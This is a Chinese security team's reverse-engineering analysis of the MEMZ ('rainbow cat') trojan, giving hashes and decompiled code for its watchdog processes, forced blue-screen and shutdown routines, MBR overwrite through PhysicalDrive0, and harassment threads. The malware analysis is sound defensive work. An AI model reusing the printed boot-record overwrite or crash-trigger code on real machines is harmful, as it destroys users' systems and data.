本篇文章由ChaMd5安全团队逆向样本小组投稿
IOC
病毒名称:彩虹猫(MEMZ.exe)
来源:https://app.any.run/tasks/3ffef12e-bddd-4c57-8aa5-906711a7b045/
作用:篡改MBR,使系统启动后只能显示彩虹猫画面;运行时鼠标键盘完全无法正常使用,会反复打开应用程序,耗尽系统资源。
SHA256:A3D5715A81F2FBEB5F76C88C9C21EEEE87142909716472F911FF6950C790C24D
SHA1:6FED7732F7CB6F59743795B2AB154A3676F4C822
MD5:19DBEC50735B5F2A72D4199C4E184960
概述
这个病毒应该是某位大神制作的重制版,因为运行前有一定的警示。同样,app.any.run上还有其它语言的版本,包括JS、.NET等。
分析
用IDA打开后可以看到,主线程首先会弹出警示对话框
if ( MessageBoxA(
0,
"The software you just executed is considered malware.rn"
"This malware will harm your computer and makes it unusable.rn"
"If you are seeing this message without knowing what you just executed, simply press No and nothing will happen."
"rn"
"If you know what this malware does and are using a safe environment to test, press Yes to start it.rn"
"rn"
"DO YOU WANT TO EXECUTE THIS MALWARE, RESULTING IN AN UNUSABLE MACHINE?",
"MEMZ",
0x34u) == 6
&& MessageBoxA(
0,
"THIS IS THE LAST WARNING!rn"
"rn"
"THE CREATOR IS NOT RESPONSIBLE FOR ANY DAMAGE MADE USING THIS MALWARE!rn"
"STILL EXECUTE IT?",
"MEMZ",
0x34u) == 6 )
如果用户在这两个警示中都点击了“是”(MessageBoxA返回6,即IDYES),则程序开始创建子进程,重新运行自身
v10 = (WCHAR *)LocalAlloc(0x40u, 0x4000u);
GetModuleFileNameW(0, v10, 0x2000u);
v11 = 5;
do
{
ShellExecuteW(0, 0, v10, L"/watchdog", 0, 10);
--v11;
}
while ( v11 );
pExecInfo.cbSize = 60;
pExecInfo.lpFile = v10;
pExecInfo.lpParameters = L"/main";
pExecInfo.fMask = 64;
pExecInfo.hwnd = 0;
pExecInfo.lpVerb = 0;
pExecInfo.lpDirectory = 0;
pExecInfo.hInstApp = 0;
pExecInfo.nShow = 10;
ShellExecuteExW(&pExecInfo);
SetPriorityClass(pExecInfo.hProcess, 0x80u);
其中5个子进程以/watchdog为参数,1个子进程以/main为参数
/watchdog参数
if ( !lstrcmpW(v1[1], L"/watchdog") )
{
CreateThread(0, 0, sub_40114A, 0, 0, 0);
pExecInfo.lpVerb = (LPCWSTR)48;
pExecInfo.lpParameters = (LPCWSTR)sub_401000;
pExecInfo.hIcon = (HANDLE)"hax";
pExecInfo.lpFile = 0;
pExecInfo.lpDirectory = 0;
pExecInfo.nShow = 0;
pExecInfo.hInstApp = 0;
pExecInfo.lpIDList = 0;
pExecInfo.lpClass = 0;
pExecInfo.hkeyClass = 0;
pExecInfo.dwHotKey = 0;
pExecInfo.hProcess = 0;
RegisterClassExA((const WNDCLASSEXA *)&pExecInfo.lpVerb);
CreateWindowExA(0, "hax", 0, 0, 0, 0, 100, 100, 0, 0, 0, 0);
while ( GetMessageW(&Msg, 0, 0, 0) > 0 )
{
TranslateMessage(&Msg);
DispatchMessageW(&Msg);
}
}
会创建一个运行sub_40114A的线程,并注册一个以sub_401000为窗口过程、类名为"hax"的窗口类(窗口类结构体复用了pExecInfo变量的内存),然后进入消息循环处理消息。
sub_40114A函数
lpString1 = (LPCSTR)LocalAlloc(0x40u, 0x200u);
v1 = GetCurrentProcess();
GetProcessImageFileNameA(v1, lpString1, 512);// 获取自己的可执行文件名称
Sleep(0x3E8u);
while ( 1 )
{
v2 = CreateToolhelp32Snapshot(2u, 0);
pe.dwSize = 556;
Process32FirstW(v2, &pe);
v3 = lpString1;
v4 = 0;
do
{
hObject = OpenProcess(0x400u, 0, pe.th32ProcessID);
lpString2 = (LPCSTR)LocalAlloc(0x40u, 0x200u);
GetProcessImageFileNameA(hObject, lpString2, 512);
if ( !lstrcmpA(v3, lpString2) ) // 查看一下该程序在内存中的进程数
++v4;
CloseHandle(hObject);
LocalFree((HLOCAL)lpString2);
}
while ( Process32NextW(v2, &pe) );
CloseHandle(v2);
if ( v4 < v7 ) // 如果这次内存中的进程少于上次遍历,则执行下面的函数
sub_401021();
v7 = v4;
Sleep(0xAu);
其中sub_401021用于触发蓝屏,若无法触发则强制关机
do
{
CreateThread(0, 0x1000u, StartAddress, 0, 0, 0);
Sleep(0x64u);
--v1;
}
while ( v1 );
v2 = v14;
v14 = a1;
v9 = v2;
v3 = LoadLibraryA("ntdll");
RtlAdjustPrivilege = GetProcAddress(v3, "RtlAdjustPrivilege");
NtRaiseHardError = GetProcAddress(v3, "NtRaiseHardError");
v6 = (void (__cdecl *)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD))NtRaiseHardError;
if ( RtlAdjustPrivilege && NtRaiseHardError ) // 如果有权限就引起蓝屏异常
{
((void (__cdecl *)(int, int, _DWORD, char *, int, int))RtlAdjustPrivilege)(19, 1, 0, (char *)&v13 + 3, v13, v9);
v6(-1073741790, 0, 0, 0, 6, &v11);
}
v7 = GetCurrentProcess();
OpenProcessToken(v7, 0x28u, &v12);
LookupPrivilegeValueW(0, L"SeShutdownPrivilege", (PLUID)v10.Privileges);
v10.PrivilegeCount = 1;
v10.Privileges[0].Attributes = 2;
AdjustTokenPrivileges(v12, 0, &v10, 0, 0, 0);
return ExitWindowsEx(6u, 0x10007u); // 否则强制关机
startAddress
; Thread routine (stdcall with one DWORD parameter, see "retn 4"; created by
; CreateThread in sub_401021). It installs a WH_CBT hook (idHook 5) on the
; calling thread, shows a system-modal error-style MessageBox whose text is
; picked from the lpText table, then removes the hook and returns 0.
StartAddress:
push esi
call ds:GetCurrentThreadId
push eax ; dwThreadId - hook only the calling thread
push 0 ; hmod
push offset fn ; lpfn - hook procedure (its body is not shown here)
push 5 ; idHook - 5 = WH_CBT
call ds:SetWindowsHookExW
push 1010h ; uType - MB_SYSTEMMODAL (1000h) | MB_ICONERROR (10h)
push offset Caption ; "MEMZ"
mov esi, eax ; keep the hook handle for UnhookWindowsHookEx below
call sub_401A55 ; presumably the sample's random-number helper; result in eax
xor edx, edx
div ds:dword_402AD0 ; edx = eax mod dword_402AD0 (presumably the lpText entry count)
push lpText[edx*4] ; lpText - message text selected by the remainder
push 0 ; hWnd
call ds:MessageBoxA
push esi ; hhk
call ds:UnhookWindowsHookEx
xor eax, eax ; thread exit code 0
pop esi
retn 4
也就是说,一旦用户尝试结束彩虹猫进程(内存中的进程数减少),该程序就会反复弹出消息框,并强制蓝屏或关机
sub_401000函数
if ( Msg != 16 && Msg != 22 )
return DefWindowProcW(hWnd, Msg, wParam, lParam);
sub_401021((int)&savedregs);
只处理16(WM_CLOSE)和22(WM_ENDSESSION)两个消息,即关闭窗口和结束会话。如果收到这两个消息之一,则执行sub_401021函数,即上面分析的弹窗并强制蓝屏/关机的函数。
/main函数
v2 = CreateFileA("\\.\PhysicalDrive0", 0xC0000000, 3u, 0, 3u, 0, 0); //获取MBR分区句柄
hObject = v2;
if ( v2 == (HANDLE)-1 )
ExitProcess(2u);
v3 = 0;
v4 = LocalAlloc(0x40u, 0x10000u);
v5 = v4;
do
{
++v3;
*v5 = v5[byte_402118 - v4];
++v5;
}
while ( v3 < 0x12F );
for ( i = 0; i < 0x7A0; ++i )
v4[i + 510] = byte_402248[i]; // 写入的数据是byte_402248
if ( !WriteFile(v2, v4, 0x10000u, &NumberOfBytesWritten, 0) ) // 写入MBR分区
ExitProcess(3u);
CloseHandle(hObject);
v7 = CreateFileA("\note.txt", 0xC0000000, 3u, 0, 2u, 0x80u, 0);
if ( v7 == (HANDLE)-1 )
ExitProcess(4u);
if ( !WriteFile(
v7,
"YOUR COMPUTER HAS BEEN FUCKED BY THE MEMZ TROJAN.rn"
"rn"
"Your computer won't boot up again,rn"
"so use it as long as you can!rn"
"rn"
":Drn"
"rn"
"Trying to kill MEMZ will cause your system to bern"
"destroyed instantly, so don't try it :D",
0xDAu,
&NumberOfBytesWritten,
0) )
ExitProcess(5u);
CloseHandle(v7);
ShellExecuteA(0, 0, "notepad", "\note.txt", 0, 10);
v8 = 0;
v9 = (DWORD *)&off_405130; // 指向一系列函数和参数
do
{
Sleep(v9[1]);
CreateThread(0, 0, (LPTHREAD_START_ROUTINE)sub_401A2B, v9, 0, 0); // sub_401A2B单纯地执行第一个参数指向的函数
++v8;
v9 += 2;
}
while ( v8 < 0xA );
while ( 1 )
Sleep(0x2710u);
这里先覆盖了MBR(PhysicalDrive0的起始扇区),然后用notepad显示提示文本,最后创建线程依次执行一系列动作
/*
 * Likely the "openLinks" entry of the off_405130 action table: opens one of
 * the 0x2E (46) entries of the lpFile link table with the default handler via
 * ShellExecuteA("open"), then hands a1 and a derived value to sub_401B09.
 * a1: caller-supplied integer; it only enters the final formula, where a
 *     larger a1 shrinks the 1500/(a1/15+1) term towards 0.
 * Returns whatever sub_401B09 returns (presumably used as the next delay,
 * since the third argument shrinks as a1 grows — TODO confirm in sub_401B09).
 */
int __cdecl sub_4014FC(int a1)
{
int v1; // ecx - never assigned: decompiler artifact, holds whatever ecx had
unsigned int v2; // eax
int v3; // ecx - same artifact as v1
int v4; // eax
v2 = sub_401A55(v1); // sub_401A55 is presumably the sample's random-number helper
ShellExecuteA(0, "open", (&lpFile)[v2 % 0x2E], 0, 0, 10); // lpFile points to a table of links; one is picked by the remainder
v4 = sub_401A55(v3);
// a1 is passed as a double split into its low/high DWORDs, so sub_401B09 most
// likely takes (double, double); (v4 % 200) adds a jitter term to the value.
return sub_401B09(
COERCE_UNSIGNED_INT64((double)a1),
HIDWORD(COERCE_UNSIGNED_INT64((double)a1)),
(double)(v4 % 200) + 1500.0 / ((double)a1 / 15.0 + 1.0) + 100.0);
}
off_405130指向的函数
.data:00405130 off_405130 dd offset openLinks ; DATA XREF: start+1F1↑o
.data:00405134 db 30h ; 0
.data:00405135 db 75h ; u
.data:00405136 db 0
.data:00405137 db 0
.data:00405138 dd offset moveCursor
.data:0040513C db 30h ; 0
.data:0040513D db 75h ; u
.data:0040513E db 0
.data:0040513F db 0
.data:00405140 dd offset randomInput
.data:00405144 db 20h
.data:00405145 db 4Eh ; N
.data:00405146 db 0
.data:00405147 db 0
.data:00405148 dd offset playSound
.data:0040514C db 50h ; P
.data:0040514D db 0C3h
.data:0040514E db 0
.data:0040514F db 0
.data:00405150 dd offset drawRect
.data:00405154 db 30h ; 0
.data:00405155 db 75h ; u
.data:00405156 db 0
.data:00405157 db 0
;...
可见这些函数的作用就是干扰各种输入,并制造视觉、听觉上的干扰。
总结
彩虹猫病毒对系统的破坏性较大,但是程序逻辑并没有混淆隐藏,所以整体分析过程比较顺利。
可以通过重装系统或修复引导记录(MBR)进行修复。
end
招新小广告
ChaMd5 Venom 招收大佬入圈
新成立组IOT+工控+样本分析+AI 长期招新
本文始发于微信公众号(ChaMd5安全团队):彩虹猫病毒分析(MEMZ)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。